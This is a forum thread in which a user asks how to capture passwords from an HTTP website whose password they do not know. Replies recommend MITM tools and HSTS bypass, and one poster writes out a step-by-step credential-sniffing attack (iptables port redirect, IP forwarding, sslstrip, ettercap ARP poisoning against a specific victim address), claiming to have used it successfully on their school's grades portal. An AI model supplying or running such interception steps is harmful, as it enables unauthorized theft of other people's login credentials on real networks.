Trying to "GET" password from http website

Is there any way to get or sniff password from a HTTP website? Plz i have watched many YouTube videos about capturing passwords using Wireshark but in these cases we need to know the exact login password. Here i do not know the password. Kindly help if you know.

Hii root sec
According to me u can use mitmf or bettercap or xerosploit
Or u can bypass hsts and then use wireshark for the passwd dumping this will defenately work🙃

I tried this on the web-site of my school (small http interface to view grades, schedules… not very secure ) and it worked .

-Modify iptables rules:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port (listening port)
-activate port forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
-use sslstrip
ssltrip -l (listening-port)
-use ettercap (victim) (access point)
ettercap -Tq -M arp:remote -i wlan0 -S /192.168.1.115// /192.168.1.1//

did you see in the POST segment ?

try this https://www.guru99.com/wireshark-passwords-sniffer.html

i used this in my last semester lab.

Any more details or briefing available ?

isn’t xerxes for ddos attack?

@Rootsec It is pretty straight forward .
This is the result:


What other details do you need?

Yes my bad bro i want to say xerosploit
My mistake bro :stuck_out_tongue_closed_eyes::stuck_out_tongue_closed_eyes::stuck_out_tongue_closed_eyes::stuck_out_tongue_closed_eyes::stuck_out_tongue_closed_eyes: